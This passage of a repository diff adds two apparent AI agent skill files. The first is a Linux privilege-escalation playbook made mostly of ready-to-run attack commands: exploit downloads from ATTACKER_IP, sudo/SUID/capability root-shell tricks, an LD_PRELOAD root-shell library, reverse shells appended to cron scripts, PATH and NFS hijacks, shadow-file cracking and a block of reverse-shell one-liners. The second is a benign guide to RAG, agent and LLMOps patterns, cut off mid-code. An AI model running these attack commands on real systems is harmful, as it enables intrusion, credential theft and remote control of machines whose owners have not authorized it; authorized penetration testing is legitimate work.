- Recommendations for remediation

### Evidence Artifacts

- Screenshots of successful privilege escalation
- Command output logs demonstrating root access
- Identified vulnerability details
- Exploited configuration files

## Core Workflow

### Phase 1: System Enumeration

#### Basic System Information

Gather fundamental system details for vulnerability research:

```bash
# Hostname and system role
hostname

# Kernel version and architecture
uname -a

# Detailed kernel information
cat /proc/version

# Operating system details
cat /etc/issue
cat /etc/*-release

# Architecture
arch
```

#### User and Permission Enumeration

```bash
# Current user context
whoami
id

# Users with login shells
cat /etc/passwd | grep -v nologin | grep -v false

# Users with home directories
cat /etc/passwd | grep home

# Group memberships
groups

# Other logged-in users
w
who
```

#### Network Information

```bash
# Network interfaces
ifconfig
ip addr

# Routing table
ip route

# Active connections
netstat -antup
ss -tulpn

# Listening services
netstat -l
```

#### Process and Service Enumeration

```bash
# All running processes
ps aux
ps -ef

# Process tree view
ps axjf

# Services running as root
ps aux | grep root
```

#### Environment Variables

```bash
# Full environment
env

# PATH variable (for hijacking)
echo $PATH
```

### Phase 2: Automated Enumeration

Deploy automated scripts for comprehensive enumeration:

```bash
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
./LinEnum.sh -t

# Linux Smart Enumeration
./lse.sh -l 1

# Linux Exploit Suggester
./les.sh
```

Transfer scripts to target system:

```bash
# On attacker machine
python3 -m http.server 8000

# On target machine
wget http://ATTACKER_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
```

### Phase 3: Kernel Exploits

#### Identify Kernel Version

```bash
uname -r
cat /proc/version
```

#### Search for Exploits

```bash
# Use Linux Exploit Suggester
./linux-exploit-suggester.sh

# Manual search on exploit-db
searchsploit linux kernel [version]
```

#### Common Kernel Exploits

| Kernel Version | Exploit | CVE |
|---------------|---------|-----|
| 2.6.22 - 4.8.x | Dirty COW | CVE-2016-5195 |
| 4.4.x - 4.13.x | eBPF verifier | CVE-2017-16995 |
| 5.8 - 5.16.x | Dirty Pipe | CVE-2022-0847 |

#### Compile and Execute

```bash
# Transfer exploit source
wget http://ATTACKER_IP/exploit.c

# Compile on target
gcc exploit.c -o exploit

# Execute
./exploit
```

### Phase 4: Sudo Exploitation

#### Enumerate Sudo Privileges

```bash
sudo -l
```

#### GTFOBins Sudo Exploitation

Reference https://gtfobins.github.io for exploitation commands:

```bash
# Example: vim with sudo
sudo vim -c ':!/bin/bash'

# Example: find with sudo
sudo find . -exec /bin/sh \; -quit

# Example: awk with sudo
sudo awk 'BEGIN {system("/bin/bash")}'

# Example: python with sudo
sudo python -c 'import os; os.system("/bin/bash")'

# Example: less with sudo
sudo less /etc/passwd
!/bin/bash
```

#### LD_PRELOAD Exploitation

When env_keep includes LD_PRELOAD:

```c
// shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
```

```bash
# Compile shared library
gcc -fPIC -shared -o shell.so shell.c -nostartfiles

# Execute with sudo
sudo LD_PRELOAD=/tmp/shell.so find
```

### Phase 5: SUID Binary Exploitation

#### Find SUID Binaries

```bash
find / -type f -perm -04000 -ls 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
```
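To see concretely what `-perm -04000` matches, set the SUID bit on a scratch file you own; the bit is inert on a non-root-owned, non-executable-by-others file, so this demonstration is harmless:

```shell
tmpdir=$(mktemp -d)
touch "$tmpdir/demo"
chmod 4755 "$tmpdir/demo"    # 04000 = SUID bit, 0755 = rwxr-xr-x

# -perm -04000 matches any file with the SUID bit set
find "$tmpdir" -perm -04000 -type f

ls -l "$tmpdir/demo"         # mode column shows -rwsr-xr-x (the "s" is the SUID bit)
```

The `s` in place of the owner's `x` in `ls -l` output is the same marker you look for when triaging real SUID binaries.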

#### Exploit SUID Binaries

Reference GTFOBins for SUID exploitation:

```bash
# Example: base64 for file reading
LFILE=/etc/shadow
base64 "$LFILE" | base64 -d

# Example: cp for file writing
cp /bin/bash /tmp/bash
chmod +s /tmp/bash
/tmp/bash -p

# Example: find with SUID
find . -exec /bin/sh -p \; -quit
```

#### Password Cracking via SUID

```bash
# Read shadow file (if base64 has SUID)
base64 /etc/shadow | base64 -d > shadow.txt
base64 /etc/passwd | base64 -d > passwd.txt

# On attacker machine
unshadow passwd.txt shadow.txt > hashes.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
```

#### Add User to passwd (if nano/vim has SUID)

```bash
# Generate password hash
openssl passwd -1 -salt new newpassword

# Add to /etc/passwd (using SUID editor)
newuser:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
```

### Phase 6: Capabilities Exploitation

#### Enumerate Capabilities

```bash
getcap -r / 2>/dev/null
```

#### Exploit Capabilities

```bash
# Example: python with cap_setuid
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# Example: vim with cap_setuid
./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/bash", "bash", "-c", "reset; exec bash")'

# Example: perl with cap_setuid
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
```

### Phase 7: Cron Job Exploitation

#### Enumerate Cron Jobs

```bash
# System crontab
cat /etc/crontab

# User crontabs
ls -la /var/spool/cron/crontabs/

# Cron directories
ls -la /etc/cron.*

# Systemd timers
systemctl list-timers
```

#### Exploit Writable Cron Scripts

```bash
# Identify writable cron script from /etc/crontab
ls -la /opt/backup.sh  # Check permissions
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh

# If cron references non-existent script in writable PATH
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' > /home/user/antivirus.sh
chmod +x /home/user/antivirus.sh
```

### Phase 8: PATH Hijacking

```bash
# Find SUID binary calling external command
strings /usr/local/bin/suid-binary
# Shows: system("service apache2 start")

# Hijack by creating malicious binary in writable PATH
export PATH=/tmp:$PATH
echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/service
chmod +x /tmp/service
/usr/local/bin/suid-binary  # Execute SUID binary
```
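The resolution order this technique abuses can be demonstrated harmlessly on any machine. No SUID binary is involved below; `service` is just a scratch script name chosen to mirror the scenario above:

```shell
# Whichever directory appears first in PATH wins the lookup.
demo=$(mktemp -d)
printf '#!/bin/sh\necho hijacked\n' > "$demo/service"
chmod +x "$demo/service"

PATH="$demo:$PATH"
command -v service     # resolves to $demo/service, ahead of any system copy
service                # prints: hijacked
```

This is exactly why a SUID binary that calls `system("service ...")` with an unqualified name, while honoring the caller's PATH, runs the attacker's script instead of the real one.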

### Phase 9: NFS Exploitation

```bash
# On target - look for no_root_squash option
cat /etc/exports

# On attacker - mount share and create SUID binary
showmount -e TARGET_IP
mount -o rw TARGET_IP:/share /tmp/nfs

# Create and compile SUID shell
echo 'int main(){setuid(0);setgid(0);system("/bin/bash");return 0;}' > /tmp/nfs/shell.c
gcc /tmp/nfs/shell.c -o /tmp/nfs/shell && chmod +s /tmp/nfs/shell

# On target - execute
/share/shell
```

## Quick Reference

### Enumeration Commands Summary

| Purpose | Command |
|---------|---------|
| Kernel version | `uname -a` |
| Current user | `id` |
| Sudo rights | `sudo -l` |
| SUID files | `find / -perm -u=s -type f 2>/dev/null` |
| Capabilities | `getcap -r / 2>/dev/null` |
| Cron jobs | `cat /etc/crontab` |
| Writable dirs | `find / -writable -type d 2>/dev/null` |
| NFS exports | `cat /etc/exports` |

### Reverse Shell One-Liners

```bash
# Bash
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

# Python
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

# Netcat
nc -e /bin/bash ATTACKER_IP 4444

# Perl
perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");'
```

### Key Resources

- GTFOBins: https://gtfobins.github.io
- LinPEAS: https://github.com/carlospolop/PEASS-ng
- Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester

## Constraints and Guardrails

### Operational Boundaries

- Verify kernel exploits in test environment before production use
- Failed kernel exploits may crash the system
- Document all changes made during privilege escalation
- Maintain access persistence only as authorized

### Technical Limitations

- Modern kernels may have exploit mitigations (ASLR, SMEP, SMAP)
- AppArmor/SELinux may restrict exploitation techniques
- Container environments limit kernel-level exploits
- Hardened systems may have restricted sudo configurations

### Legal and Ethical Requirements

- Written authorization required before testing
- Stay within defined scope boundaries
- Report critical findings immediately
- Do not access data beyond scope requirements

## Examples

### Example 1: Sudo to Root via find

**Scenario**: User has sudo rights for find command

```bash
$ sudo -l
User user may run the following commands:
    (root) NOPASSWD: /usr/bin/find

$ sudo find . -exec /bin/bash \; -quit
# id
uid=0(root) gid=0(root) groups=0(root)
```

### Example 2: SUID base64 for Shadow Access

**Scenario**: base64 binary has SUID bit set

```bash
$ find / -perm -u=s -type f 2>/dev/null | grep base64
/usr/bin/base64

$ base64 /etc/shadow | base64 -d
root:$6$xyz...:18000:0:99999:7:::

# Crack offline with john
$ john --wordlist=rockyou.txt shadow.txt
```

### Example 3: Cron Job Script Hijacking

**Scenario**: Root cron job executes writable script

```bash
$ cat /etc/crontab
* * * * * root /opt/scripts/backup.sh

$ ls -la /opt/scripts/backup.sh
-rwxrwxrwx 1 root root 50 /opt/scripts/backup.sh

$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /opt/scripts/backup.sh

# Wait 1 minute
$ /tmp/bash -p
# id
uid=1000(user) gid=1000(user) euid=0(root)
```

## Troubleshooting

| Issue | Solutions |
|-------|-----------|
| Exploit compilation fails | Check for gcc: `which gcc`; compile on attacker for same arch; use `gcc -static` |
| Reverse shell not connecting | Check firewall; try ports 443/80; use staged payloads; check egress filtering |
| SUID binary not exploitable | Verify version matches GTFOBins; check AppArmor/SELinux; some binaries drop privileges |
| Cron job not executing | Verify cron running: `service cron status`; check +x permissions; verify PATH in crontab |
760 skills/llm-app-patterns/SKILL.md Normal file
@@ -0,0 +1,760 @@
---
name: llm-app-patterns
description: "Production-ready patterns for building LLM applications. Covers RAG pipelines, agent architectures, prompt IDEs, and LLMOps monitoring. Use when designing AI applications, implementing RAG, building agents, or setting up LLM observability."
---

# 🤖 LLM Application Patterns

> Production-ready patterns for building LLM applications, inspired by [Dify](https://github.com/langgenius/dify) and industry best practices.

## When to Use This Skill

Use this skill when:

- Designing LLM-powered applications
- Implementing RAG (Retrieval-Augmented Generation)
- Building AI agents with tools
- Setting up LLMOps monitoring
- Choosing between agent architectures

---

## 1. RAG Pipeline Architecture

### Overview

RAG (Retrieval-Augmented Generation) grounds LLM responses in your data.

```
┌─────────────┐     ┌─────────────┐     ┌─────────────┐
│   Ingest    │────▶│  Retrieve   │────▶│  Generate   │
│  Documents  │     │   Context   │     │  Response   │
└─────────────┘     └─────────────┘     └─────────────┘
      │                   │                   │
      ▼                   ▼                   ▼
 ┌─────────┐        ┌───────────┐       ┌───────────┐
 │ Chunking│        │  Vector   │       │   LLM     │
 │Embedding│        │  Search   │       │ + Context │
 └─────────┘        └───────────┘       └───────────┘
```

### 1.1 Document Ingestion

```python
# Chunking strategies
class ChunkingStrategy:
    # Fixed-size chunks (simple but may break context)
    FIXED_SIZE = "fixed_size"  # e.g., 512 tokens

    # Semantic chunking (preserves meaning)
    SEMANTIC = "semantic"  # Split on paragraphs/sections

    # Recursive splitting (tries multiple separators)
    RECURSIVE = "recursive"  # ["\n\n", "\n", " ", ""]

    # Document-aware (respects structure)
    DOCUMENT_AWARE = "document_aware"  # Headers, lists, etc.

# Recommended settings
CHUNK_CONFIG = {
    "chunk_size": 512,     # tokens
    "chunk_overlap": 50,   # token overlap between chunks
    "separators": ["\n\n", "\n", ". ", " "],
}
```
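The `RECURSIVE` strategy above can be sketched in a few lines. This is a simplified, character-based illustration (production splitters count tokens and add overlap); the separator list mirrors the config shown:

```python
def recursive_split(text, separators, chunk_size=512):
    """Try each separator in order; regroup pieces into chunks under chunk_size."""
    if len(text) <= chunk_size:
        return [text]
    if not separators:
        # No separator left: hard-split at the limit
        return [text[i:i + chunk_size] for i in range(0, len(text), chunk_size)]

    sep, rest = separators[0], separators[1:]
    pieces = text.split(sep) if sep else list(text)

    chunks, current = [], ""
    for piece in pieces:
        candidate = current + sep + piece if current else piece
        if len(candidate) <= chunk_size:
            current = candidate              # piece still fits: keep growing
        else:
            if current:
                chunks.append(current)       # flush the full chunk
            if len(piece) > chunk_size:
                # Piece itself too large: recurse with the next separator
                chunks.extend(recursive_split(piece, rest, chunk_size))
                current = ""
            else:
                current = piece
    if current:
        chunks.append(current)
    return chunks

doc = "Intro paragraph.\n\nSecond paragraph with more words.\n\nThird."
chunks = recursive_split(doc, ["\n\n", "\n", ". ", " "], chunk_size=40)
print(chunks)
```

Because the paragraph separator is tried first, chunks tend to align with semantic boundaries and only fall back to sentence, word, or character splits when a unit is too large.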

### 1.2 Embedding & Storage

```python
# Vector database selection
VECTOR_DB_OPTIONS = {
    "pinecone": {
        "use_case": "Production, managed service",
        "scale": "Billions of vectors",
        "features": ["Hybrid search", "Metadata filtering"]
    },
    "weaviate": {
        "use_case": "Self-hosted, multi-modal",
        "scale": "Millions of vectors",
        "features": ["GraphQL API", "Modules"]
    },
    "chromadb": {
        "use_case": "Development, prototyping",
        "scale": "Thousands of vectors",
        "features": ["Simple API", "In-memory option"]
    },
    "pgvector": {
        "use_case": "Existing Postgres infrastructure",
        "scale": "Millions of vectors",
        "features": ["SQL integration", "ACID compliance"]
    }
}

# Embedding model selection
EMBEDDING_MODELS = {
    "openai/text-embedding-3-small": {
        "dimensions": 1536,
        "cost": "$0.02/1M tokens",
        "quality": "Good for most use cases"
    },
    "openai/text-embedding-3-large": {
        "dimensions": 3072,
        "cost": "$0.13/1M tokens",
        "quality": "Best for complex queries"
    },
    "local/bge-large": {
        "dimensions": 1024,
        "cost": "Free (compute only)",
        "quality": "Comparable to OpenAI small"
    }
}
```
|
||||
|
||||
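Whichever store you pick, retrieval reduces to nearest-neighbor search over embeddings. A brute-force version shows the core operation (illustrative only — real vector databases use approximate indexes such as HNSW rather than a linear scan):

```python
import math

def cosine(a, b):
    """Cosine similarity between two equal-length vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    na = math.sqrt(sum(x * x for x in a))
    nb = math.sqrt(sum(y * y for y in b))
    return dot / (na * nb)

def top_k(query_vec, index, k=2):
    """index: list of (doc_id, vector) pairs; returns best k by similarity."""
    scored = [(doc_id, cosine(query_vec, vec)) for doc_id, vec in index]
    return sorted(scored, key=lambda s: s[1], reverse=True)[:k]
```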
### 1.3 Retrieval Strategies

```python
# Basic semantic search
def semantic_search(query: str, top_k: int = 5):
    query_embedding = embed(query)
    results = vector_db.similarity_search(
        query_embedding,
        top_k=top_k
    )
    return results

# Hybrid search (semantic + keyword)
def hybrid_search(query: str, top_k: int = 5, alpha: float = 0.5):
    """
    alpha=1.0: Pure semantic
    alpha=0.0: Pure keyword (BM25)
    alpha=0.5: Balanced
    """
    semantic_results = semantic_search(query, top_k=top_k)
    keyword_results = bm25_search(query)

    # Reciprocal Rank Fusion
    return rrf_merge(semantic_results, keyword_results, alpha)

# Multi-query retrieval
def multi_query_retrieval(query: str):
    """Generate multiple query variations for better recall"""
    queries = llm.generate_query_variations(query, n=3)
    all_results = []
    for q in queries:
        all_results.extend(semantic_search(q))
    return deduplicate(all_results)

# Contextual compression
def compressed_retrieval(query: str):
    """Retrieve, then compress to the relevant parts only"""
    docs = semantic_search(query, top_k=10)
    compressed = llm.extract_relevant_parts(docs, query)
    return compressed
```
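The `rrf_merge` step can be implemented with the standard Reciprocal Rank Fusion formula, score = Σ 1/(k + rank); the `alpha` weighting between the two lists is an addition here for illustration, not part of the original RRF definition:

```python
def rrf_merge(semantic_results, keyword_results, alpha=0.5, k=60):
    """Fuse two ranked lists of doc ids; alpha weights semantic vs keyword."""
    scores = {}
    for rank, doc in enumerate(semantic_results):
        scores[doc] = scores.get(doc, 0.0) + alpha / (k + rank + 1)
    for rank, doc in enumerate(keyword_results):
        scores[doc] = scores.get(doc, 0.0) + (1 - alpha) / (k + rank + 1)
    # Highest fused score first
    return sorted(scores, key=scores.get, reverse=True)
```

A document appearing in both lists accumulates score from each, which is why RRF favors items the two retrievers agree on.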
### 1.4 Generation with Context

```python
RAG_PROMPT_TEMPLATE = """
Answer the user's question based ONLY on the following context.
If the context doesn't contain enough information, say "I don't have enough information to answer that."

Context:
{context}

Question: {question}

Answer:"""

def generate_with_rag(question: str):
    # Retrieve
    context_docs = hybrid_search(question, top_k=5)
    context = "\n\n".join([doc.content for doc in context_docs])

    # Generate
    prompt = RAG_PROMPT_TEMPLATE.format(
        context=context,
        question=question
    )

    response = llm.generate(prompt)

    # Return with citations
    return {
        "answer": response,
        "sources": [doc.metadata for doc in context_docs]
    }
```
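Joining all retrieved documents can overflow the model's context window. A greedy budget check before formatting the prompt avoids that; this sketch counts characters for simplicity (real systems count tokens with the model's tokenizer):

```python
def build_context(docs, max_chars=4000):
    """Greedily pack ranked snippets until the character budget is hit."""
    parts, used = [], 0
    for doc in docs:
        cost = len(doc) + (2 if parts else 0)  # account for the "\n\n" joiner
        if used + cost > max_chars:
            break
        parts.append(doc)
        used += cost
    return "\n\n".join(parts)
```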
---

## 2. Agent Architectures

### 2.1 ReAct Pattern (Reasoning + Acting)
```
Thought: I need to search for information about X
Action: search("X")
Observation: [search results]
Thought: Based on the results, I should...
Action: calculate(...)
Observation: [calculation result]
Thought: I now have enough information
Action: final_answer("The answer is...")
```

```python
REACT_PROMPT = """
You are an AI assistant that can use tools to answer questions.

Available tools:
{tools_description}

Use this format:
Thought: [your reasoning about what to do next]
Action: [tool_name(arguments)]
Observation: [tool result - this will be filled in]
... (repeat Thought/Action/Observation as needed)
Thought: I have enough information to answer
Final Answer: [your final response]

Question: {question}
"""

class ReActAgent:
    def __init__(self, tools: list, llm):
        self.tools = {t.name: t for t in tools}
        self.llm = llm
        self.max_iterations = 10

    def run(self, question: str) -> str:
        prompt = REACT_PROMPT.format(
            tools_description=self._format_tools(),
            question=question
        )

        for _ in range(self.max_iterations):
            response = self.llm.generate(prompt)

            if "Final Answer:" in response:
                return self._extract_final_answer(response)

            action = self._parse_action(response)
            observation = self._execute_tool(action)
            prompt += f"\nObservation: {observation}\n"

        return "Max iterations reached"
```
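The `_parse_action` helper has to pull the tool name and arguments out of the model's free text. A minimal regex-based sketch (the format is the one the prompt requests; malformed-output handling is elided):

```python
import re

def parse_action(response: str):
    """Extract (tool_name, raw_args) from a line like 'Action: tool(args)'."""
    match = re.search(r"Action:\s*(\w+)\((.*)\)", response)
    if not match:
        return None
    return match.group(1), match.group(2)
```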
### 2.2 Function Calling Pattern

```python
# Define tools as functions with schemas
TOOLS = [
    {
        "name": "search_web",
        "description": "Search the web for current information",
        "parameters": {
            "type": "object",
            "properties": {
                "query": {
                    "type": "string",
                    "description": "Search query"
                }
            },
            "required": ["query"]
        }
    },
    {
        "name": "calculate",
        "description": "Perform mathematical calculations",
        "parameters": {
            "type": "object",
            "properties": {
                "expression": {
                    "type": "string",
                    "description": "Math expression to evaluate"
                }
            },
            "required": ["expression"]
        }
    }
]

class FunctionCallingAgent:
    def run(self, question: str) -> str:
        messages = [{"role": "user", "content": question}]

        while True:
            response = self.llm.chat(
                messages=messages,
                tools=TOOLS,
                tool_choice="auto"
            )

            if response.tool_calls:
                # Note: real chat APIs also require appending the assistant
                # message containing the tool calls before the tool results
                for tool_call in response.tool_calls:
                    result = self._execute_tool(
                        tool_call.name,
                        tool_call.arguments
                    )
                    messages.append({
                        "role": "tool",
                        "tool_call_id": tool_call.id,
                        "content": str(result)
                    })
            else:
                return response.content
```
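The `calculate` tool above should never be wired to a bare `eval`, since the model controls the expression. One safer approach — an assumption here, not the framework's implementation — walks the AST and permits arithmetic only:

```python
import ast
import operator

_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
        ast.Mult: operator.mul, ast.Div: operator.truediv,
        ast.USub: operator.neg}

def safe_calculate(expression: str):
    """Evaluate arithmetic only (numbers and + - * /), rejecting anything else."""
    def ev(node):
        if isinstance(node, ast.Expression):
            return ev(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](ev(node.left), ev(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](ev(node.operand))
        raise ValueError("unsupported expression")
    return ev(ast.parse(expression, mode="eval"))
```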
### 2.3 Plan-and-Execute Pattern

```python
class PlanAndExecuteAgent:
    """
    1. Create a plan (list of steps)
    2. Execute each step
    3. Replan if needed
    """

    def run(self, task: str) -> str:
        # Planning phase
        plan = self.planner.create_plan(task)
        # Returns: ["Step 1: ...", "Step 2: ...", ...]

        results = []
        i = 0
        # A while loop (rather than `for step in plan`) so that
        # reassigning `plan` below actually affects the iteration
        while i < len(plan):
            # Execute the next step
            result = self.executor.execute(plan[i], context=results)
            results.append(result)
            i += 1

            # Check if replan needed
            if self._needs_replan(task, results):
                plan = plan[:i] + self.planner.replan(
                    task,
                    completed=results,
                    remaining=plan[i:]
                )

        # Synthesize final answer
        return self.synthesizer.summarize(task, results)
```
### 2.4 Multi-Agent Collaboration

```python
class AgentTeam:
    """
    Specialized agents collaborating on complex tasks
    """

    def __init__(self):
        self.agents = {
            "researcher": ResearchAgent(),
            "analyst": AnalystAgent(),
            "writer": WriterAgent(),
            "critic": CriticAgent()
        }
        self.coordinator = CoordinatorAgent()

    def solve(self, task: str) -> str:
        # Coordinator assigns subtasks
        assignments = self.coordinator.decompose(task)

        results = {}
        for assignment in assignments:
            agent = self.agents[assignment.agent]
            result = agent.execute(
                assignment.subtask,
                context=results
            )
            results[assignment.id] = result

        # Critic reviews
        critique = self.agents["critic"].review(results)

        if critique.needs_revision:
            # Iterate with feedback
            return self.solve_with_feedback(task, results, critique)

        return self.coordinator.synthesize(results)
```
---

## 3. Prompt IDE Patterns

### 3.1 Prompt Templates with Variables
```python
class PromptTemplate:
    def __init__(self, template: str, variables: list[str]):
        self.template = template
        self.variables = variables

    def format(self, **kwargs) -> str:
        # Validate all variables provided
        missing = set(self.variables) - set(kwargs.keys())
        if missing:
            raise ValueError(f"Missing variables: {missing}")

        return self.template.format(**kwargs)

    def with_examples(self, examples: list[dict]) -> str:
        """Add few-shot examples"""
        example_text = "\n\n".join([
            f"Input: {ex['input']}\nOutput: {ex['output']}"
            for ex in examples
        ])
        return f"{example_text}\n\n{self.template}"

# Usage
summarizer = PromptTemplate(
    template="Summarize the following text in {style} style:\n\n{text}",
    variables=["style", "text"]
)

prompt = summarizer.format(
    style="professional",
    text="Long article content..."
)
```
### 3.2 Prompt Versioning & A/B Testing

```python
import hashlib
from datetime import datetime

class PromptRegistry:
    def __init__(self, db):
        self.db = db

    def register(self, name: str, template: str, version: str):
        """Store prompt with version"""
        self.db.save({
            "name": name,
            "template": template,
            "version": version,
            "created_at": datetime.now(),
            "metrics": {}
        })

    def get(self, name: str, version: str = "latest") -> str:
        """Retrieve specific version"""
        return self.db.get(name, version)

    def ab_test(self, name: str, user_id: str) -> str:
        """Return variant based on user bucket"""
        variants = self.db.get_all_versions(name)
        # Use a stable digest: Python's built-in hash() of strings is
        # randomized per process, which would reshuffle buckets on restart
        digest = int(hashlib.sha256(user_id.encode()).hexdigest(), 16)
        bucket = digest % len(variants)
        return variants[bucket]

    def record_outcome(self, prompt_id: str, outcome: dict):
        """Track prompt performance"""
        self.db.update_metrics(prompt_id, outcome)
```
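Stable bucketing matters because a user must see the same variant on every request, across processes. A quick check of the sha256 approach, with roughly even splits over many users:

```python
import hashlib

def bucket(user_id: str, n_variants: int) -> int:
    """Deterministically map a user id to one of n variants."""
    digest = int(hashlib.sha256(user_id.encode()).hexdigest(), 16)
    return digest % n_variants

buckets = [bucket(f"user-{i}", 2) for i in range(1000)]
```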
### 3.3 Prompt Chaining

```python
class PromptChain:
    """
    Chain prompts together, passing output as input to the next step
    """

    def __init__(self, steps: list[dict]):
        self.steps = steps

    def run(self, initial_input: str) -> dict:
        context = {"input": initial_input}
        results = []

        for step in self.steps:
            prompt = step["prompt"].format(**context)
            output = llm.generate(prompt)

            # Parse output if needed
            if step.get("parser"):
                output = step["parser"](output)

            context[step["output_key"]] = output
            results.append({
                "step": step["name"],
                "output": output
            })

        return {
            "final_output": context[self.steps[-1]["output_key"]],
            "intermediate_results": results
        }

# Example: Research → Analyze → Summarize
chain = PromptChain([
    {
        "name": "research",
        "prompt": "Research the topic: {input}",
        "output_key": "research"
    },
    {
        "name": "analyze",
        "prompt": "Analyze these findings:\n{research}",
        "output_key": "analysis"
    },
    {
        "name": "summarize",
        "prompt": "Summarize this analysis in 3 bullet points:\n{analysis}",
        "output_key": "summary"
    }
])
```
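The chaining mechanics can be exercised without a real model by stubbing the generator — `fake_llm` here is a hypothetical stand-in that just echoes the prompt length:

```python
def fake_llm(prompt: str) -> str:
    """Stand-in for llm.generate: echoes the prompt length."""
    return f"<out:{len(prompt)}>"

def run_chain(steps, initial_input, generate=fake_llm):
    """Minimal version of PromptChain.run: thread outputs through the context."""
    context = {"input": initial_input}
    for step in steps:
        context[step["output_key"]] = generate(step["prompt"].format(**context))
    return context[steps[-1]["output_key"]]
```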
---

## 4. LLMOps & Observability

### 4.1 Metrics to Track

```python
LLM_METRICS = {
    # Performance
    "latency_p50": "50th percentile response time",
    "latency_p99": "99th percentile response time",
    "tokens_per_second": "Generation speed",

    # Quality
    "user_satisfaction": "Thumbs up/down ratio",
    "task_completion": "% tasks completed successfully",
    "hallucination_rate": "% responses with factual errors",

    # Cost
    "cost_per_request": "Average $ per API call",
    "tokens_per_request": "Average tokens used",
    "cache_hit_rate": "% requests served from cache",

    # Reliability
    "error_rate": "% failed requests",
    "timeout_rate": "% requests that timed out",
    "retry_rate": "% requests needing retry"
}
```
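The latency percentiles above are computed from raw request timings; a nearest-rank sketch (one of several percentile definitions — monitoring backends usually do this for you):

```python
def percentile(samples, p):
    """Nearest-rank percentile (p in [0, 100]) of a non-empty list of numbers."""
    ordered = sorted(samples)
    k = max(0, min(len(ordered) - 1, round(p / 100 * len(ordered)) - 1))
    return ordered[k]
```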
### 4.2 Logging & Tracing

```python
import json
import logging
from datetime import datetime

from opentelemetry import trace

tracer = trace.get_tracer(__name__)

class LLMLogger:
    def log_request(self, request_id: str, data: dict):
        """Log LLM request for debugging and analysis"""
        log_entry = {
            "request_id": request_id,
            "timestamp": datetime.now().isoformat(),
            "model": data["model"],
            "prompt": data["prompt"][:500],  # Truncate for storage
            "prompt_tokens": data["prompt_tokens"],
            "temperature": data.get("temperature", 1.0),
            "user_id": data.get("user_id"),
        }
        logging.info(f"LLM_REQUEST: {json.dumps(log_entry)}")

    def log_response(self, request_id: str, data: dict):
        """Log LLM response"""
        log_entry = {
            "request_id": request_id,
            "completion_tokens": data["completion_tokens"],
            "total_tokens": data["total_tokens"],
            "latency_ms": data["latency_ms"],
            "finish_reason": data["finish_reason"],
            "cost_usd": self._calculate_cost(data),
        }
        logging.info(f"LLM_RESPONSE: {json.dumps(log_entry)}")

# Distributed tracing
@tracer.start_as_current_span("llm_call")
def call_llm(prompt: str) -> str:
    span = trace.get_current_span()
    span.set_attribute("prompt.length", len(prompt))

    response = llm.generate(prompt)

    span.set_attribute("response.length", len(response.content))
    span.set_attribute("tokens.total", response.usage.total_tokens)

    return response.content
```
### 4.3 Evaluation Framework

```python
class LLMEvaluator:
    """
    Evaluate LLM outputs for quality
    """

    def evaluate_response(self,
                          question: str,
                          response: str,
                          ground_truth: str = None) -> dict:
        scores = {}

        # Relevance: Does it answer the question?
        scores["relevance"] = self._score_relevance(question, response)

        # Coherence: Is it well-structured?
        scores["coherence"] = self._score_coherence(response)

        # Groundedness: Is it based on provided context?
        scores["groundedness"] = self._score_groundedness(response)

        # Accuracy: Does it match ground truth?
        if ground_truth:
            scores["accuracy"] = self._score_accuracy(response, ground_truth)

        # Harmfulness: Is it safe?
        scores["safety"] = self._score_safety(response)

        return scores

    def run_benchmark(self, test_cases: list[dict]) -> dict:
        """Run evaluation on test set"""
        results = []
        for case in test_cases:
            response = llm.generate(case["prompt"])
            scores = self.evaluate_response(
                question=case["prompt"],
                response=response,
                ground_truth=case.get("expected")
            )
            results.append(scores)

        return self._aggregate_scores(results)
```
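The `_aggregate_scores` step is a per-metric mean across test cases; a minimal sketch (metrics missing from some cases are averaged over the cases that have them):

```python
def aggregate_scores(results):
    """Average each metric across all evaluated test cases."""
    totals = {}
    for scores in results:
        for metric, value in scores.items():
            totals.setdefault(metric, []).append(value)
    return {metric: sum(vals) / len(vals) for metric, vals in totals.items()}
```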
---

## 5. Production Patterns

### 5.1 Caching Strategy
```python
import hashlib
import json

class LLMCache:
    def __init__(self, redis_client, ttl_seconds=3600):
        self.redis = redis_client
        self.ttl = ttl_seconds

    def _cache_key(self, prompt: str, model: str, **kwargs) -> str:
        """Generate deterministic cache key"""
        content = f"{model}:{prompt}:{json.dumps(kwargs, sort_keys=True)}"
        return hashlib.sha256(content.encode()).hexdigest()

    def get_or_generate(self, prompt: str, model: str, **kwargs) -> str:
        key = self._cache_key(prompt, model, **kwargs)

        # Check cache
        cached = self.redis.get(key)
        if cached:
            return cached.decode()

        # Generate
        response = llm.generate(prompt, model=model, **kwargs)

        # Cache (only cache deterministic outputs)
